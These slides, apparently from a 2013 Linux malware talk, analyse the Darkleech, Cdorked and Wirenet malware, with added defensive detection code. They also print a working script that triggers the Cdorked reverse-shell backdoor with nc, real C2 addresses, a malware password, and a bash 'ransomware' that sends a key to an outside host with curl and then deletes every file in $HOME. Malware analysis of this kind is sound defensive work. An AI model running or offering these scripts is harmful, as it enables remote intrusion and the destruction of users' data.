Linux malware presentation @r00tbsd – Paul Rascagnères from Malware.lu
Linux malware presentation
@r00tbsd – Paul Rascagnères, Malware.lu
July 2013

Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
Who am I?
Paul Rascagnères - @r00tbsd or @malware.lu. Creator and maintainer of malware.lu. Malware analysis, Incident Response, Reverse Engineering... Author of “Malware – Identification, analyse et éradication”.
Why am I here and why this talk?
Some people think that malware does not exist on the Linux platform. 4 examples from 2012/2013:
First seen
The first version was identified in August 2012.

How does it work?
This malware (Darkleech/Chapro) is an Apache module. The module is loaded by a LoadModule directive defined in the module's configuration file.

Features:
Analysis - module
Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so
Example: mod_sec2_config.so
Module execution:
    cat /etc/apache2/modules/[VARIOUS].conf
    LoadModule sec2_config_module modules/mod_sec2_config.so

Analysis - Symptoms
The malware injects exploit-kit JavaScript into the served web pages:
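A defender's version of the slide above: walk the Apache configuration, pull every LoadModule directive and flag module files that no package accounts for. This is an added example, not a script from the talk; the configuration excerpt and the allow-list are constructed, and in practice the allow-list is built from the package manager's file lists for the installed Apache packages. The mod_xxx_yyy.so pattern from the slide is only supporting evidence, since legitimate modules such as mod_auth_basic.so match it too.

```python
import re
from typing import List, Tuple

# Directive form shown on the slide: LoadModule <identifier> <path to .so>
LOADMODULE_RE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.IGNORECASE | re.MULTILINE)
# File-name pattern from the slide: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so
CHAPRO_NAME_RE = re.compile(r"^mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so$")


def audit_loadmodules(config_text: str, known_files: set) -> List[Tuple[str, str, List[str]]]:
    """Return (identifier, path, reasons) for every LoadModule line worth a look.

    known_files is the administrator's allow-list of module file names that
    installed packages own; anything else loaded into Apache needs an explanation.
    """
    findings = []
    for ident, path in LOADMODULE_RE.findall(config_text):
        filename = path.rsplit("/", 1)[-1]
        reasons = []
        if filename not in known_files:
            reasons.append("module file is not on the package allow-list")
        # Apache convention: mod_foo.so exports foo_module; a mismatch is unusual
        if filename.startswith("mod_") and filename.endswith(".so"):
            expected = filename[len("mod_"):-len(".so")] + "_module"
            if ident != expected:
                reasons.append("identifier %r does not match file name (expected %r)" % (ident, expected))
        # The slide's naming pattern only strengthens an existing finding
        if reasons and CHAPRO_NAME_RE.match(filename):
            reasons.append("file name also matches the mod_xxx_yyy.so pattern from the slide")
        if reasons:
            findings.append((ident, path, reasons))
    return findings


# Constructed configuration excerpt and allow-list (not taken from a real host)
CONSTRUCTED_CONFIG = """
# constructed excerpt of /etc/apache2/mods-enabled/*.load
LoadModule alias_module /usr/lib/apache2/modules/mod_alias.so
LoadModule auth_basic_module /usr/lib/apache2/modules/mod_auth_basic.so
LoadModule sec2_config_module modules/mod_sec2_config.so
"""
KNOWN_FILES = {"mod_alias.so", "mod_auth_basic.so"}

if __name__ == "__main__":
    for ident, path, reasons in audit_loadmodules(CONSTRUCTED_CONFIG, KNOWN_FILES):
        print("%s (%s):" % (ident, path))
        for reason in reasons:
            print("  -", reason)
```

On a Debian-style host the allow-list comes from the files the apache2 packages install; `dpkg -S` on a module path tells you which package, if any, owns it.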
Analysis - Symptoms
Analysis – Symptoms
The redirection is performed by an injected JavaScript snippet that adds an IFrame:
Analysis – Targets selection
Target selection is based on the REFERER. Banned User-Agent substrings (C_ARRAY_BAN_USERAGENT):
SAFARI YANDEX OPERA CRAWLER FIREFOX JIKE CHROME SPIDER GOOGLEBOT ROBOT SLURP PAPERLIBOT YAHOO SNAPPREVIEWBOT BING BUFFERBOT LINUX MEDIAPARTNERS OPENBSD HATENA MACINTOSH BLUEDRAGON MAC OS WORDPRESS IPHONE XIANGUO ...
Analysis – Reversing
The data are encoded in the file:
Analysis – Reversing
Several functions (symbols) are related to the encoding:
Analysis – Reversing
xor_decrypt_string pseudo-C:

    xor_decrypt_string(A8, Ac, A10, A14) {
        L00003117();
        ebx = ebx + 0x5001;
        esp = esp - 0xc;
        Vfffffff4 = A14 + 1;
        *esp = *( *( *( *(ebx + -300)) + 0xc));
        *(ebp - 0x10) = L00002D90();
        if(A14 > 0) {
            ecx = 0;
            do {
                edx = 0;
                eax = 0;
                edx = 0 >> 0x1f;
                Ac = Ac / Ac;
                al = *A10 & 0xff ^ *(Ac % Ac + A8);
                *( *(ebp - 0x10)) = al;
            } while(1 != A14);
        }
        esi = *(ebp - 0x10);
        *(esi + A14) = 0;
        eax = esi;
        esp = esp + 0xc;
    }
Analysis – Reversing
xor_decrypt_string python implementation:

    from itertools import cycle

    # fd: the module opened with open(path, 'rb')
    # tab: list of {'name', 'offset', 'size'} entries, one per encoded string (from the symbols above)
    def xor_decrypt_strings(fd, tab):
        fd.seek(0x84a0)            # offset of the 23-byte XOR key in mod_sec2_config.so
        key = fd.read(23)
        for s in tab:
            fd.seek(s['offset'])
            data = fd.read(s['size'])
            # repeating-key XOR: the key cycles over the data
            decrypted = bytes(c ^ k for c, k in zip(data, cycle(key)))
            clear_text = decrypted.split(b'\x00')[0]
            print('%s: %s' % (s['name'], clear_text.decode('latin-1')))
Analysis – Reversing

    $ python sec2.py "./mod_sec2_config.so"
    C_MODULE_VERSION: "2012.12.14"
    C_CC_HOST: "217.23.13.6"
    C_CC_URI: "/Home/index.php"
    C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1" Host: "%s" Content-Type: "application/x-www-form-urlencoded" Content-Length:" %i %s"
    C_MARKER_LEFT: "{{{"
    C_MARKER_RIGHT: "}}}"
    C_TMP_DIR: "/"
    C_LIST_PREF: "sess_"
    C_COOKIE_NAME: "PHP_SESSION_ID="
    C_ARRAY_TAGS_FOR_INJECT: " </script> </style> </head> </title> ...
Presentation
Unlike its brother Darkleech/Chapro, Cdorked is not an Apache module but a custom Apache server. The malware uses XOR to encrypt its strings:

    from itertools import cycle

    # fd: the Apache binary opened with open(path, 'rb')
    # tab: list of {'offset', 'size'} entries for the encoded strings
    def xor_decrypt_strings(fd, tab):
        fd.seek(0x16B460)          # offset of the 24-byte XOR key
        key = fd.read(24)
        for i, s in enumerate(tab):
            fd.seek(s['offset'])
            data = fd.read(s['size'])
            decrypted = bytes(c ^ k for c, k in zip(data, cycle(key)))
            print('xx%s: %s' % (i, decrypted.decode('latin-1')))
How to get a shell? - request
How to get a shell? - encryption
How to get a shell? - encryption
Here is the code:

    ip = $client_ip
    key[0] = ( (ip AND 0xFF000000) >> 24 ) + 5
    key[1] = ( (ip AND 0xFF0000  ) >> 16 ) + 33
    key[2] = ( (ip AND 0xFF00    ) >> 8  ) + 55
    key[3] = ( (ip               )       ) + 78
How to get a shell? - the reverse-shell

    # Python 2 (urllib2, str.encode('hex'))
    import urllib2
    import subprocess
    import os

    LHOST = '192.168.56.1'      # host receiving the shell
    LPORT = '4444'
    RHOST = '192.168.56.101'    # backdoored Apache server
    RPORT = '80'

    # command and its parameters, hex-encoded into the query string
    param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex')
    request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param)

    if os.fork():
        # parent: send the request; X-Real-IP feeds the key derivation shown above
        req = urllib2.Request(request)
        req.add_header('X-Real-IP', '251.223.201.178')
        urllib2.urlopen(req)
    else:
        # child: listen for the connection back
        subprocess.call(['nc', '-l', LPORT])
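Turning the request shape above into a detection: the backdoor command travels as a hex-encoded query string on an otherwise meaningless path (`/favicon.iso`). The added example below (not code from the talk) scans Apache combined-format access log lines for requests whose entire query string is hex that decodes to printable ASCII and reports the decoded text for triage. The log lines are constructed; whether the compromised binary itself records such requests is not something the slides address, so the same check is worth running on logs from an upstream proxy or IDS as well.

```python
import re
from typing import Dict, List, Optional

# Apache combined log format; the constructed sample lines below follow it
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# whole query string is hex, at least 4 bytes long (filters out short accidental matches)
HEX_RE = re.compile(r"^(?:[0-9a-fA-F]{2}){4,}$")


def decode_hex_query(url: str) -> Optional[str]:
    """If the query string is nothing but hex that decodes to printable ASCII, return it."""
    _, sep, query = url.partition("?")
    if not sep or not HEX_RE.match(query):
        return None
    raw = bytes.fromhex(query)
    if not all(0x20 <= b < 0x7F for b in raw):
        return None
    return raw.decode("ascii")


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per request carrying a hex-encoded printable query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_hex_query(m.group("url"))
        if decoded is None:
            continue
        findings.append({
            "client": m.group("client"),
            "path": m.group("url").partition("?")[0],
            "status": m.group("status"),
            "decoded": decoded,
        })
    return findings


# Constructed sample: two ordinary requests and one shaped like the slide's GET_BACK request
CMD_HEX = "GET_BACK;192.168.56.1;4444".encode("ascii").hex()
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Jul/2013:10:00:01 +0200] "GET /index.php?id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Jul/2013:10:00:02 +0200] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Jul/2013:10:00:03 +0200] "GET /favicon.iso?%s HTTP/1.1" 200 0 "-" "Python-urllib/2.7"' % CMD_HEX,
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("%(client)s requested %(path)s (status %(status)s): %(decoded)r" % f)
```

The client also sends an X-Real-IP header that the server uses for key derivation; a default LogFormat does not record it, but adding `%{X-Real-IP}i` to the format makes a request that claims an unroutable source address visible in the same log.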
Strings obfuscation
The attacker used the RC4 algorithm to encrypt the configuration:
Strings obfuscation

    import sys
    from Crypto.Cipher import ARC4    # PyCryptodome

    # crypted: list of {'name', 'adr', 'len'} entries for the encrypted fields
    # options: {option_name: bit_mask} for the flags packed into BoolSettingsByte
    def isOption(val, mask):
        # assumed: BoolSettingsByte is a bit field tested with a mask
        return bool(int(val) & mask)

    fp = open(sys.argv[1], 'rb')
    fp.seek(0xf4d8, 0)                # offset of the 16-byte RC4 key
    key = fp.read(16)
    for c in crypted:
        rc4 = ARC4.new(key)           # fresh keystream for every field
        fp.seek(c['adr'])
        data = fp.read(c['len'])
        val = rc4.decrypt(data).split(b'\x00')[0].decode('latin-1')
        print("%s: %s" % (c['name'], val))
        if c['name'] == 'BoolSettingsByte':
            for name, o in options.items():
                print("%s: %s" % (name, isOption(val, o)))
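To show what the decoder above relies on without a crypto library, here is an added example (not the talk's script) that implements RC4 in plain Python, builds a constructed binary image with a key at a fixed offset and NUL-padded RC4-encrypted fields behind it, and recovers the fields the way the analysis does. The key offset, field size and field values are invented for the example; the table of {'name', 'adr', 'len'} entries stands in for the addresses an analyst recovers from the sample.

```python
from typing import Dict, List, Tuple


def rc4_ksa(key: bytes) -> List[int]:
    """RC4 key-scheduling: permute 0..255 under the key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_config(image: bytes, key_offset: int, key_len: int, table: List[Dict]) -> Dict[str, str]:
    """Read the key at key_offset, then decrypt every table entry ({'name','adr','len'})
    with a fresh keystream, as the talk's script does with ARC4.new() per field."""
    key = image[key_offset:key_offset + key_len]
    out = {}
    for entry in table:
        blob = image[entry["adr"]:entry["adr"] + entry["len"]]
        out[entry["name"]] = rc4_crypt(key, blob).split(b"\x00")[0].decode("latin-1")
    return out


# ---- constructed test image; offsets and values are invented for this example ----
KEY_OFFSET = 0x40     # assumed position of the 16-byte key in the fake image
FIELD_LEN = 32        # assumed fixed size of each NUL-padded field


def build_image(key: bytes, fields: List[Tuple[str, str]]) -> Tuple[bytes, List[Dict]]:
    """Lay out padding, the key, then one RC4-encrypted NUL-padded field per entry;
    return the image and the address table an analyst would recover from symbols."""
    image = bytearray(b"\x90" * KEY_OFFSET) + bytearray(key)
    table = []
    for name, value in fields:
        table.append({"name": name, "adr": len(image), "len": FIELD_LEN})
        plain = value.encode("latin-1").ljust(FIELD_LEN, b"\x00")
        image += rc4_crypt(key, plain)
    return bytes(image), table


CONSTRUCTED_KEY = b"0123456789abcdef"
CONSTRUCTED_FIELDS = [
    ("ConnectionString", "198.51.100.7:4141;"),
    ("HostId", "LINUX"),
    ("InstallPath", "%home%/WIFIADAPT"),
]

if __name__ == "__main__":
    image, table = build_image(CONSTRUCTED_KEY, CONSTRUCTED_FIELDS)
    for name, value in decrypt_config(image, KEY_OFFSET, len(CONSTRUCTED_KEY), table).items():
        print("%s: %s" % (name, value))
```

Because a new cipher instance is created for every field, each field is XORed with the same keystream prefix; that is what lets the analyst decrypt the fields independently once the key offset is known, and it is also why the scheme offers no real protection beyond hiding strings from `strings`.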
Strings obfuscation

    y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e
    ConnectionString: 212.7.208.65:4141;
    ProxyString: -
    Password: sm0k4s523syst3m523
    HostId: LINUX
    MutexName: vJEewiWD
    InstallPath: %home%/WIFIADAPT
    StartupKeyName1: WIFIADAPTER
    StartupKeyName2: -
    KeyLoggerFileName: %Home%\.m8d.dat
    BoolSettingsByte: 237
    run_as_daemon: True
    xinit_start: False
    install_file: True
    lock_file?: True
    keylogger: True
    single_instance: True
    desktop_start: True
    ConnectionType: 001
Fake C&C

    wirenet $ New session 127.0.0.1:52956
    wirenet $ session
    0 127.0.0.1:52956 LINUX rootbsd @ alien
    wirenet $ session 0
    Switch to session 0 context
    127.0.0.1:52956 $ help
    Undocumented commands:
    ======================
    EOF          cred_thunderbird  get   log_clear  mkdir  rm       shell
    cp           creds             help  log_get    mv     screen
    cred_pidgin  exit              info  ls         ps     session
Fake C&C

    127.0.0.1:52956 $ info
    arch: LINUX
    name: rootbsd @ alien
    DISTRIB_ID=Ubuntu
    DISTRIB_RELEASE=12.04
    DISTRIB_CODENAME=precise
    DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"
    127.0.0.1:52956 $ shell
    Shell is start with /bin/sh (EOF to exit)
    id
    uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1001(bumblebee)
    Shell is stop
Linux is so powerful... (ransomware for free)

    #!/bin/bash
    passwd=$(openssl rand -hex 64)
    curl http://www.c-and-c.com/test?$passwd
    list=$(find $HOME -type f)
    for i in $(echo $list)
    do
        rm $i
    done